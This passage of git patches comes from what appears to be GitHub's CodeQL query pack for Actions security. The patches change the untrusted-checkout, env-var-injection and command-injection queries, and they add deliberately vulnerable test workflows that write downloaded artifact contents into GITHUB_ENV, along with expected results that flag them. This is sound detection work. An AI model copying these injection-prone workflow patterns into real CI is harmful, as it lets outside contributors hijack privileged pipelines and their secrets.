.github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | @@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | From 1a5a3044c2447e3a58454eba41a134e786d51321 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:25:31 +0200 Subject: [PATCH 0546/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8447d10d94b..a453e0c9612 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.56 +version: 0.1.57 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b167a960886..b90f38e4b1a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.56 +version: 0.1.57 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4fffde2fc58962940f4389aab1635b7ce1d6e352 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:38:38 +0200 Subject: [PATCH 0547/1267] Add remote flow sources as a mutable ref source for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 ++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 4 ++++ 2 files changed, 16 insertions(+) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 100a9c5dd5d..a3ea6be06fc 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,5 +1,6 @@ import actions private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking /** @@ -8,6 +9,17 @@ private import codeql.actions.TaintTracking */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or // `ref` argument contains the PR id/number or head ref exists(Expression e | source.asExpr() = e and diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 9358d65e8f4..4dc2b53e591 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -266,6 +266,10 @@ edges #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | From 1b3b47bb1edfa5704b0e5538db4395112a43786e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:39:51 +0200 Subject: [PATCH 0548/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a453e0c9612..6f57c4554d0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.57 +version: 0.1.58 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b90f38e4b1a..d3b65425c41 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.57 +version: 0.1.58 groups: [actions, queries] suites: codeql-suites extractor: javascript From f2c5a14883fb0ebc859f4dabd73051c8245eba37 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:57:32 +0200 Subject: [PATCH 0549/1267] Fix: ControlChecks protects/dominates only work with Steps. A sink can be in a sub-step node (eg: ScalarValue) --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++ .../codeql/actions/security/ControlChecks.qll | 22 +- .../CWE-077/EnvVarInjectionCritical.ql | 11 +- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-077/.github/workflows/test11.yml | 81 ++++++++ .../CWE-077/.github/workflows/test12.yml | 80 +++++++ .../CWE-077/EnvVarInjectionCritical.expected | 19 ++ .../CWE-077/EnvVarInjectionMedium.expected | 16 ++ .../actions/run-airbyte-ci/action.yaml | 196 ++++++++++++++++++ .../CWE-078/.github/workflows/test1.yml | 63 ++++++ .../CWE-078/CommandInjectionCritical.expected | 7 + .../CWE-078/CommandInjectionMedium.expected | 9 + 13 files changed, 507 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17b0dab4ee6..63f2552f582 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -13,6 +13,8 @@ class AstNode instanceof AstNodeImpl { string toString() { result = super.toString() } + Step getEnclosingStep() { result = super.getEnclosingStep() } + Job getEnclosingJob() { result = super.getEnclosingJob() } Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5361943331b..d4716f89e19 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -110,6 +110,18 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets the enclosing Step. + */ + StepImpl getEnclosingStep() { + if this instanceof StepImpl + then result = this + else + if this instanceof ScalarValueImpl + then result.getAChildNode*() = this.getParentNode() + else none() + } + /** * Gets the enclosing workflow if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 052b22cd338..b9410f0fcb0 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -37,29 +37,29 @@ abstract class ControlCheck extends AstNode { this instanceof Run } - predicate protects(Step step, Event event, string category) { + predicate protects(AstNode node, Event event, string category) { // The check dominates the step it should protect - this.dominates(step) and + this.dominates(node) and // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event this.getEnclosingJob().getATriggerEvent() = event } - predicate dominates(Step step) { + predicate dominates(AstNode node) { this instanceof If and ( - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + node.getEnclosingStep().getIf() = this or + node.getEnclosingJob().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this ) or this instanceof Environment and ( - step.getEnclosingJob().getEnvironment() = this + node.getEnclosingJob().getEnvironment() = this or - step.getEnclosingJob().getANeededJob().getEnvironment() = this + node.getEnclosingJob().getANeededJob().getEnvironment() = this ) or ( @@ -67,9 +67,9 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep ) and ( - this.(Step).getAFollowingStep() = step + this.(Step).getAFollowingStep() = node.getEnclosingStep() or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) ) } diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index b301915d79c..ad97dd3caef 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -22,19 +22,20 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, E where EnvVarInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, "envvar-injection") - ) and // exclude paths to file read sinks from non-artifact sources ( + // source is text not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, "code-injection") + check.protects(sink.getNode().asExpr(), event, ["envvar-injection", "code-injection"]) ) or + // source is an artifact or a file from an untrusted checkout source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + check + .protects(sink.getNode().asExpr(), event, + ["envvar-injection", "untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 80281e8db30..c3d6fa74f6c 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -16,11 +16,15 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr(), event) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml new file mode 100644 index 00000000000..2c2480f5353 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -0,0 +1,81 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + if: ${{ github.repository_owner == 'cloudflare' }} + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml new file mode 100644 index 00000000000..3a0c4cc91b8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -0,0 +1,80 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 359275aef43..cbd17161942 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -61,6 +69,14 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -84,3 +100,6 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| 